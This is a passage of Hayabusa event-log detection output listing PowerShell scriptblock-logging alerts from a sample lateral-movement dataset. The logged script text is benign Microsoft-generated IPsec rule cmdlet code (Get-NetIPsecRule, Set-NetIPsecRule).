'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery',",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ne=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery',",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 